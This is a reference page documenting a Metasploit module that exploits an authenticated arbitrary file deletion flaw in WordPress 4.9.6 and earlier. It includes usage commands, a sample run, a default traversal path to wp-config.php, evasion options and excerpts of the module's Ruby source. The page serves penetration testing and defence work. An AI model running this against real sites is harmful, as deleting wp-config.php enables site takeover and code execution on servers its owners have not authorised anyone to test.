Wordpress Arbitrary File Deletion - Metasploit


This page contains detailed information about how to use the auxiliary/scanner/http/wp_arbitrary_file_deletion metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Wordpress Arbitrary File Deletion
Module: auxiliary/scanner/http/wp_arbitrary_file_deletion
Source code: modules/auxiliary/scanner/http/wp_arbitrary_file_deletion.rb
Disclosure date: 2018-06-26
Last modification time: 2022-01-23 15:28:32 +0000
Supported architecture(s): php
Supported platform(s): PHP
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: -

An arbitrary file deletion vulnerability in the WordPress core allows any user with privileges of an Author to completely take over the WordPress site and to execute arbitrary code on the server.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


msf > use auxiliary/scanner/http/wp_arbitrary_file_deletion
msf auxiliary(wp_arbitrary_file_deletion) > show targets
    ... a list of targets ...
msf auxiliary(wp_arbitrary_file_deletion) > set TARGET target-id
msf auxiliary(wp_arbitrary_file_deletion) > show options
    ... show and set options ...
msf auxiliary(wp_arbitrary_file_deletion) > exploit

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

  • USERNAME: The WordPress username to authenticate with

  • PASSWORD: The WordPress password to authenticate with

Knowledge Base


Description


An arbitrary file deletion vulnerability in the WordPress core allows any user with privileges of an Author to completely take over the WordPress site and to execute arbitrary code on the server.

Vulnerable Application


WordPress <= 4.9.6

Verification Steps


  1. Do: use auxiliary/scanner/http/wp_arbitrary_file_deletion
  2. Do: set USERNAME [USERNAME]
  3. Do: set PASSWORD [PASSWORD]
  4. Do: set RHOSTS [IP]
  5. Do: run

Scenarios


msf5 > use auxiliary/scanner/http/wp_arbitrary_file_deletion 
msf5 auxiliary(scanner/http/wp_arbitrary_file_deletion) > set VERBOSE true
VERBOSE => true
msf5 auxiliary(scanner/http/wp_arbitrary_file_deletion) > set RPORT 8000
RPORT => 8000
msf5 auxiliary(scanner/http/wp_arbitrary_file_deletion) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf5 auxiliary(scanner/http/wp_arbitrary_file_deletion) > set PASSWORD xxx
PASSWORD => password1
msf5 auxiliary(scanner/http/wp_arbitrary_file_deletion) > set USERNAME xxx
USERNAME => techbrunch
msf5 auxiliary(scanner/http/wp_arbitrary_file_deletion) > run

[*] Checking if target is online and running Wordpress...
[*] Checking access...
[*] Getting the nonce...
[*] Uploading media...
[*] Editing thumb path...
[*] Deleting media...
[+] File deleted!
[*] Auxiliary module execution completed

Go back to menu.

Msfconsole Usage


Here is how the scanner/http/wp_arbitrary_file_deletion auxiliary module looks in the msfconsole:

msf6 > use auxiliary/scanner/http/wp_arbitrary_file_deletion

msf6 auxiliary(scanner/http/wp_arbitrary_file_deletion) > show info

       Name: Wordpress Arbitrary File Deletion
     Module: auxiliary/scanner/http/wp_arbitrary_file_deletion
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2018-06-26

Provided by:
  Slavco Mihajloski
  Karim El Ouerghemmi
  Alo��s Th��venot

Check supported:
  No

Basic options:
  Name       Current Setting            Required  Description
  ----       ---------------            --------  -----------
  FILEPATH   ../../../../wp-config.php  yes       The path to the file to delete
  PASSWORD                              yes       The WordPress password to authenticate with
  Proxies                               no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                                yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      80                         yes       The target port (TCP)
  SSL        false                      no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                          yes       The base path to the wordpress application
  USERNAME                              yes       The WordPress username to authenticate with
  VHOST                                 no        HTTP server virtual host

Description:
  An arbitrary file deletion vulnerability in the WordPress core 
  allows any user with privileges of an Author to completely take over 
  the WordPress site and to execute arbitrary code on the server.

References:
  https://wpscan.com/vulnerability/9100
  https://www.exploit-db.com/exploits/44949
  https://packetstormsecurity.com/files/148333
  https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/
  https://blog.vulnspy.com/2018/06/27/Wordpress-4-9-6-Arbitrary-File-Delection-Vulnerbility-Exploit/

Module Options


This is a complete list of options available in the scanner/http/wp_arbitrary_file_deletion auxiliary module:

msf6 auxiliary(scanner/http/wp_arbitrary_file_deletion) > show options

Module options (auxiliary/scanner/http/wp_arbitrary_file_deletion):

   Name       Current Setting            Required  Description
   ----       ---------------            --------  -----------
   FILEPATH   ../../../../wp-config.php  yes       The path to the file to delete
   PASSWORD                              yes       The WordPress password to authenticate with
   Proxies                               no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80                         yes       The target port (TCP)
   SSL        false                      no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                          yes       The base path to the wordpress application
   USERNAME                              yes       The WordPress username to authenticate with
   VHOST                                 no        HTTP server virtual host

Advanced Options


Here is a complete list of advanced options supported by the scanner/http/wp_arbitrary_file_deletion auxiliary module:

msf6 auxiliary(scanner/http/wp_arbitrary_file_deletion) > show advanced

Module advanced options (auxiliary/scanner/http/wp_arbitrary_file_deletion):

   Name                  Current Setting                                     Required  Description
   ----                  ---------------                                     --------  -----------
   DOMAIN                WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS         true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   FingerprintCheck      true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                         no        HTTP connection and receive timeout
   HttpPassword                                                              no        The HTTP password to specify for authentication
   HttpRawHeaders                                                            no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace             false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors       red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly  false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                              no        The HTTP username to specify for authentication
   SSLVersion            Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent             Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE               false                                               no        Enable detailed status messages
   WORKSPACE                                                                 no        Specify the workspace for this module
   WPCHECK               true                                                yes       Check if the website is a valid WordPress install
   WPCONTENTDIR          wp-content                                          yes       The name of the wp-content directory

Auxiliary Actions


This is a list of all auxiliary actions that the scanner/http/wp_arbitrary_file_deletion module can do:

msf6 auxiliary(scanner/http/wp_arbitrary_file_deletion) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the scanner/http/wp_arbitrary_file_deletion auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(scanner/http/wp_arbitrary_file_deletion) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Could not get the nonce (<RES.CODE>)


Here is a relevant code snippet related to the "Could not get the nonce (<RES.CODE>)" error message:

58:	      'uri'     => normalize_uri(wordpress_url_backend, 'upload.php'),
59:	      'cookie'  => cookie
60:	    )
61:	
62:	    unless res && (res.code == 200)
63:	      fail_with(Failure::UnexpectedReply, "Could not get the nonce (#{res.code})")
64:	    end
65:	
66:	    res.body.scan(/"_wpnonce":"([a-z0-9]+)"/)[0][0].to_s
67:	  end
68:	

The target is not online and running Wordpress


Here is a relevant code snippet related to the "The target is not online and running Wordpress" error message:

67:	  end
68:	
69:	  def run
70:	    vprint_status('Checking if target is online and running Wordpress...')
71:	    if wordpress_and_online?.nil?
72:	      fail_with(Failure::BadConfig, 'The target is not online and running Wordpress')
73:	    end
74:	    vprint_status('Checking access...')
75:	    cookie = wordpress_login(username, password)
76:	    if cookie.nil?
77:	      fail_with(Failure::BadConfig, 'Invalid credentials')

Invalid credentials


Here is a relevant code snippet related to the "Invalid credentials" error message:

72:	      fail_with(Failure::BadConfig, 'The target is not online and running Wordpress')
73:	    end
74:	    vprint_status('Checking access...')
75:	    cookie = wordpress_login(username, password)
76:	    if cookie.nil?
77:	      fail_with(Failure::BadConfig, 'Invalid credentials')
78:	    end
79:	    store_valid_credential(user: username, private: password, proof: cookie)
80:	
81:	    vprint_status('Getting the nonce...')
82:	    nonce = get_nonce(cookie)

Could not upload the media (<RES.CODE>)


Here is a relevant code snippet related to the "Could not upload the media (<RES.CODE>)" error message:

96:	      'data'    => post_data,
97:	      'cookie'  => cookie
98:	    )
99:	
100:	    unless res && (res.code == 200)
101:	      fail_with(Failure::UnexpectedReply, "Could not upload the media (#{res.code})")
102:	    end
103:	
104:	    json = JSON.parse(res.body)
105:	    id = json['data']['id']
106:	    update_nonce = json['data']['nonces']['update']

Could not edit media (<RES.CODE>)


Here is a relevant code snippet related to the "Could not edit media (<RES.CODE>)" error message:

118:	            'thumb' => datastore['FILEPATH']
119:	          }
120:	    )
121:	
122:	    unless res && (res.code == 302)
123:	      fail_with(Failure::UnexpectedReply, "Could not edit media (#{res.code})")
124:	    end
125:	
126:	    vprint_status('Deleting media...')
127:	    res = send_request_cgi(
128:	      'method'  => 'POST',

Could not delete media (<RES.CODE>)


Here is a relevant code snippet related to the "Could not delete media (<RES.CODE>)" error message:

135:	            'id' => id
136:	          }
137:	    )
138:	
139:	    unless res && (res.code == 200)
140:	      fail_with(Failure::UnexpectedReply, "Could not delete media (#{res.code})")
141:	    end
142:	
143:	    print_good('File deleted!')
144:	  end
145:	end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Slavco Mihajloski
  • Karim El Ouerghemmi
  • Aloïs Thévenot

Version


This page has been produced using Metasploit Framework version 6.1.36-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.